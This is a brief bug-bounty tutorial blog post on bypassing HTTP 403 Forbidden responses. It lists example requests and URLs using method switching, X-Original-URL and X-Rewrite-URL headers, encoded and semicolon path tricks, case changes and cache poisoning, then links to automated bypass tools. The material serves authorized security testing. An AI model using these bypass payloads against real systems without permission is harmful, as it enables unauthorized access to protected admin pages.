Sign in Subscribe
Bug Bounty

Learn About 403 Bypass

ayush khatkar

2 min read
Learn About 403 Bypass

When you don't have authorization to view a webpage or anything else on a web server, you get a 403 Forbidden Error. When you are bug hunting on your target, it frequently happens that you go deep into the target and that you also receive 403 Forbidden or Permission Denied. Most inexperienced users then quit it. However, if you can get beyond it, you can usually see the target's admin page or any other reliable page and conduct searches on it. By reporting it, you can also receive bounty rewards.

I'll walk you through a few manual bypass techniques and also tell you about a Linux utility that can assist you bypass automatically. Now let's get going.

Manually Bypass

Request Method Manipulation: Convert GET request to POST request.

GET /admin HTTP/1.1
Host: target.com

How to apply this

POST /admin HTTP/1.1
Host: target.com

Overriding the Target URL via Non-Standard Headers: X-Original-URL: & X-Rewrite-URL:

GET /admin HTTP/1.1
Host: target.com

How to apply this

GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin 
        OR
GET /anything HTTP/1.1
Host: target.com
X-Rewrite-URL: /admin

Appending %2e after the first slash:

http://target.com/admin => 403

How to apply this

http://target.com/%2e/admin => 200

Try add dot (.) slash (/) and semicolon (;) in the URL:

http://target.com/admin => 403

How to apply this

http://target.com/secret/. => 200
http://target.com//secret// => 200
http://target.com/./secret/.. => 200
http://target.com/;/secret => 200
http://target.com/.;/secret => 200
http://target.com//;//secret => 200

Add “..;/” after the directory name:

http://target.com/admin

How to apply this

http://target.com/admin..;/

Try to uppercase the alphabet in the URL:

http://target.com/admin

How to apply this

http://target.com/aDmIN

Via Web Cache Poisoning:

GET /anything HTTP/1.1
Host: victim.com
X­-Original-­URL: /admin

Automation Bypass

Here's a list of tools I found for bypassing 40X status codes:
https://github.com/Sn1r/Forbidden-Buster

https://github.com/lobuhi/byp4xx

https://github.com/iamj0ker/bypass-403

https://github.com/gotr00t0day/forbiddenpass

https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122

https://github.com/intrudir/BypassFuzzer

https://github.com/ivan-sincek/forbidden